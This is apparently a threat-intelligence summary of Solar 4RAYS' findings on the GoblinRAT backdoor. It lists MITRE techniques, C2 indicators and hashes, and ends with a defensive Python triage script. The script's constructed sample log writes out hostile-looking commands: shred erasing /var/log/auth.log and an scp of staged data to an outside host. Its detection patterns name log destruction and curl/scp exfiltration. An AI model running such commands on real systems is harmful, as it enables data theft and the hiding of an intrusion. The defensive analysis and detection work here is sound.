Key points
- Discovery began when a user hash dump from a domain controller was retrieved using “impacket-secretsdump,” prompting further investigation.
- Security researchers from Solar 4RAYS analyzed the incident and identified a novel backdoor named GoblinRAT.
- GoblinRAT operated covertly for about two years and primarily targeted organizations that provide services to government entities.
- The malware used compromised legitimate websites and DDNS providers to communicate with its command-and-control infrastructure.
- Persistence and stealth were achieved by mimicking legitimate services, modifying process names, running in memory, and using obfuscated libraries.
- Operators used native tools such as “shred” to remove logs and “scp” and “curl” to exfiltrate data from affected hosts.
- Reported IOCs include the domain qfilling.instanthq.com, IP 37.120.247.182, and multiple file hashes associated with GoblinRAT samples.
MITRE Techniques
- [T1003] Credential Dumping – Extracted user hashes from a domain controller using the “impacket-secretsdump” tool (‘user hash dump from a domain controller’, ‘impacket-secretsdump’)
- [T1071] Command and Control – Maintained communication with operators via compromised legitimate websites and dynamic DNS services (‘compromised legitimate websites and DDNS for command and control communication’)
- [T1055] Process Injection – Hid malicious activity by modifying process names and mimicking legitimate services on infected hosts (‘modifying process names to mimic legitimate services for stealth’)
- [T1041] Data Exfiltration – Transferred stolen data using standard utilities such as scp and curl to move files off compromised systems (‘scp and curl for exfiltrating data from compromised hosts’)
- [T1027] Obfuscated Files or Information – Employed obfuscated libraries and in-memory execution to make detection and analysis more difficult (‘obfuscated libraries’ and ‘running in memory’)
Indicators of Compromise
- [Domain] C2 infrastructure – qfilling.instanthq.com
- [IP Address] Observed C2 host – 37.120.247.182
- [File Hashes] Malicious samples linked to GoblinRAT – MD5: 3f9b1b506dfab7a5cc32004a45ed780d, SHA256: b074749f160453053989277e2eee3d1f31d618c0813f6379415a4727ed856806, and 1 more hash
In spring 2023, an IT company in Russia detected an unexpected dump of user hashes originating from a domain controller. The artifact was created using the impacket-secretsdump utility, and its presence sparked a deeper probe that ultimately involved the Solar 4RAYS research team. As investigators reconstructed the activity, they discovered a previously undocumented backdoor they named GoblinRAT. The implant had been active and evolving for roughly two years, maintaining a low profile while targeting organizations that provide services to government clients.
GoblinRAT’s operators relied on subtlety and deception rather than loud, destructive tactics. The malware communicated with its controllers through compromised but legitimate websites and dynamic DNS services, blending C2 traffic into normal-looking web requests. To avoid detection on host systems, the implant used obfuscated libraries and often executed components directly in memory, reducing its disk footprint. Operators also adopted naming conventions for tasks and files that resembled benign software, and they altered process names to mimic legitimate services so that routine monitoring would overlook them.
Persistence mechanisms for GoblinRAT included installing components that imitated standard services and modifying runtime artifacts to appear legitimate. The attackers used common administrative tools to complete their objectives: “shred” was observed being used to delete logs and erase traces, while “scp” and “curl” facilitated the extraction and transfer of stolen data. This reliance on native utilities helped the adversary blend activity into normal system operations and complicated automated detection efforts.
Solar 4RAYS’ analysis highlights that GoblinRAT is not a loud, opportunistic threat but a carefully managed toolset that emphasizes long-term access and stealth. The researchers traced communication infrastructure and sample hashes back to specific domains and IP addresses, and they tracked the malware’s evolution over multiple years. The combined use of compromised hosting, DDNS, obfuscation, in-memory execution, and native tools for cleanup and exfiltration paints a picture of an adversary focused on persistence and evasion rather than rapid disruption.
Organizations that support government entities or handle sensitive public-sector work should assume such targeted implants will attempt to hide within legitimate processes and traffic. Detection strategies should look beyond signature matches to behavioral indicators: unusual use of native tools for bulk transfers or log deletion, unexpected process name changes, in-memory execution patterns, and connections to the listed domains and IPs. Collecting and correlating endpoint telemetry with network logs can help surface the subtle signs that tools like GoblinRAT leave behind.
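As an added example (not code from the Solar 4RAYS report), the triage pass below runs over constructed process and connection telemetry and flags the behaviours named above: shred aimed at /var/log, scp and curl pushing data out, a process whose displayed name differs from its on-disk binary, and contact with the reported C2 domain and IP. The line format, hostnames, paths and the 198.51.100.7 / 203.0.113.10 addresses are constructed for the sample; only the domain and IP indicators come from the report summary.

```python
import re
# IoCs quoted in the report summary (hashes are a file-scanner job, not a log-parser job).
C2_INDICATORS = {"qfilling.instanthq.com", "37.120.247.182"}
CURL_UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form", "--data-binary"}
# Constructed telemetry format (not a real auditd/EDR schema), one event per line:
#   <ts> <host> EXEC pid=<n> comm=<name> exe=<path> argv=<cmdline>
#   <ts> <host> CONN pid=<n> comm=<name> dst=<host_or_ip>:<port>
EXEC_RE = re.compile(r"^\S+ (?P<host>\S+) EXEC pid=\d+ comm=(?P<comm>\S+) exe=(?P<exe>\S+) argv=(?P<argv>.*)$")
CONN_RE = re.compile(r"^\S+ (?P<host>\S+) CONN pid=\d+ comm=\S+ dst=(?P<dst>[^:]+):\d+$")

def triage_line(line: str) -> list[str]:
    """Return finding labels for one telemetry line (empty if nothing suspicious)."""
    findings = []
    if m := EXEC_RE.match(line):
        argv, tool = m["argv"].split(), m["exe"].rsplit("/", 1)[-1]
        # Native-tool abuse named in the report: shred on logs, scp/curl pushing data out.
        if tool == "shred" and any(a.startswith("/var/log") for a in argv):
            findings.append("log_destruction_shred")
        if tool == "scp" and any(":" in a and not a.startswith("/") for a in argv[1:]):
            findings.append("bulk_transfer_scp")  # has a remote user@host:path operand
        if tool == "curl" and CURL_UPLOAD_FLAGS.intersection(argv):
            findings.append("upload_curl")
        # Masquerade heuristic: name shown by ps (comm) differs from the on-disk binary name.
        if m["comm"] != tool:
            findings.append("process_name_mismatch")
    elif (m := CONN_RE.match(line)) and m["dst"] in C2_INDICATORS:
        findings.append("known_c2_contact")
    return findings

def triage(lines: list[str]) -> dict[str, set[str]]:
    """Aggregate finding labels per host so weak signals can be correlated."""
    per_host: dict[str, set[str]] = {}
    for line in lines:
        if hits := triage_line(line):
            per_host.setdefault(line.split(" ", 2)[1], set()).update(hits)
    return per_host

# Constructed sample: two suspicious hosts plus one benign curl download (no findings).
SAMPLE_LOG = [
    "2023-04-02T03:14:07Z dc01 EXEC pid=4121 comm=shred exe=/usr/bin/shred argv=shred -u -z /var/log/auth.log /var/log/secure",
    "2023-04-02T03:15:20Z dc01 EXEC pid=4133 comm=scp exe=/usr/bin/scp argv=scp -r /tmp/.cache/out backup@198.51.100.7:/srv/in",
    "2023-04-02T03:16:01Z app02 EXEC pid=902 comm=systemd-journal exe=/opt/.x/svc argv=/opt/.x/svc",
    "2023-04-02T03:16:02Z app02 CONN pid=902 comm=systemd-journal dst=qfilling.instanthq.com:443",
    "2023-04-02T03:17:44Z web01 EXEC pid=2210 comm=curl exe=/usr/bin/curl argv=curl -s https://updates.example.invalid/x -o /tmp/x",
    "2023-04-02T03:18:00Z web01 CONN pid=2210 comm=curl dst=203.0.113.10:443",
]
if __name__ == "__main__":
    for host, labels in sorted(triage(SAMPLE_LOG).items()):
        print(host, sorted(labels))
```

Each label on its own is weak (an admin may legitimately shred a rotated log or scp a backup); the per-host aggregation is what lets several of them on the same machine stand out.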
Read more: https://rt-solar.ru/solar-4rays/blog/4861/